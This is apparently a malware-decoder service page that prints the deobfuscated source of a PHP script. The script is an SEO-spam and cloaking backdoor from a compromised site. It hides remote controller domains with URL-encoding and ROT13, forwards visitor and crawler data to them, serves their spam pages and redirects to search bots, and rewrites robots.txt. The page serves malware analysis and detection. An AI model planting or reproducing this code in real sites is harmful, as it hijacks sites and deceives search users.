Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



$xmlname=["%31%31%35%33%2D%6F%65%76%74%75%67%30%31%32%2E%70%62%61%69%62%79%68%67%6C%2E%6B%6C%6D","%31%31%35%33%2D%6F%65%76%74%75%67%30%31%32%2E%72%63%75%72%7A%72%76%6B%2E%67%62%63","%31%31%35%33%2D%6F%65%76%74%75%67%30%31%32%2E%64%68%6E%61%67%68%6E%67%67%2E%6B%6C%6D","%31%31%35%33%2D%6F%65%76%74%75%67%30%31%32%2E%67%72%70%75%61%72%6B%63%2E%67%62%63"];
$http_web = 'http';
$host = $_SERVER['HTTP_HOST'];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
}
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$spider = is_bot();
$requestUri = drequest_uri();
$urlshang=is_from_search_engine($urlshang);
$robots = 'robots.txt';
$string = '1153-bright012';
$istest = false;
if (strpos($requestUri, $string) !== false) {
    $istest = true;
} else {
    $string = '';
}
if (strpos($requestUri, $robots) !== false || strpos($requestUri, '?robots.txt') !== false) {
    $robots = '1';
}else{
    $robots = '0';
}
if($urlshang){
    $urlshang='1';
} else {
    $urlshang = '0';
}
create_robots($http . '://' . $host);
$param = http_build_query(['host' => $host,'spider' => $spider,'requestUri' => $requestUri,'urlshang' => $urlshang,'http' => $http,'lang' => $lang,'string' => $string,
'robots' => $robots
]);
$html_content = requests($xmlname, $http_web, $param);

if (!strstr($html_content, 'nobotuseragent')) {
    if (strstr($html_content, 'okhtml')) {
        @header('Content-type: text/html; charset=utf-8');
        $html_content = str_replace('okhtml', '', $html_content);
        if ($istest) {
            echo $string;
        }
        echo $html_content;
        
    } else if (strstr($html_content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        
    } else if (strstr($html_content, '404page')) {
        @header('HTTP/1.1 404 Not Found');
        
    } else if (strstr($html_content, '301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $html_content = str_replace('301page', '', $html_content);
        header('Location: ' . $html_content);
        
    } else if (strstr($html_content, 'okxml')) {    
        $html_content = str_replace('okxml', '', $html_content);
        @header('Content-Type: application/xml; charset=utf-8');
        echo $html_content;
        
    } else if (strstr($html_content, 'okrobots')) {
        $html_content = str_replace('okrobots', '', $html_content);
        @header('Content-Type: text/plain; charset=utf-8');
        echo $html_content;
        
    }
}

function requests($xmlname, $http_web, $param)
{
    shuffle($xmlname);
    foreach ($xmlname as $domain) {
        $domain = str_rot13(urldecode($domain));
        $url = $http_web . '://' . $domain . '/?' . $param;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        if (!curl_errno($ch)) {
            curl_close($ch);
            return $response;
        } else {
            if (stristr(curl_error($ch), '443')) {
                echo "443";
            }
            curl_close($ch);
        }
        if (ini_get('allow_url_fopen')) {
                        $response = @file_get_contents($url);
                        if ($response !== false) {
                            return $response;
                        }
                }
      }
    return 'nobotuseragent';
}


function is_bot()
{
    $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    $bots = ['googlebot', 'bing', 'yahoo', 'google', 'Googlebot'];
    foreach ($bots as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return 1;
        }
    }
    return 0;
}

function drequest_uri()
{
    if (isset($_SERVER['REQUEST_URI'])) {
        $duri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $duri;
}


function is_from_search_engine($referer)
{
    if (empty($referer)) return false;

    $searchEngines = ['google.', 'bing.', 'yahoo.',];

    foreach ($searchEngines as $engine) {
        if (stripos($referer, $engine) !== false) {
            return true;
        }
    }
    return false;
}

function create_robots($url)
{
    $path = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
    $content = 'User-agent: *' . PHP_EOL;
    $content .= 'Allow: /' . PHP_EOL . PHP_EOL;
    $content .= 'Sitemap: ' . $url . '/sitemap.xml' . PHP_EOL;
    if (!file_exists($path)) {
        file_put_contents($path, $content);
    } else {
        $existingContent = file_get_contents($path);
        if ($existingContent !== $content) {
            file_put_contents($path, $content);
        }
    }
}

function is_https()
{
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}


© 2023 Quttera Ltd. All rights reserved.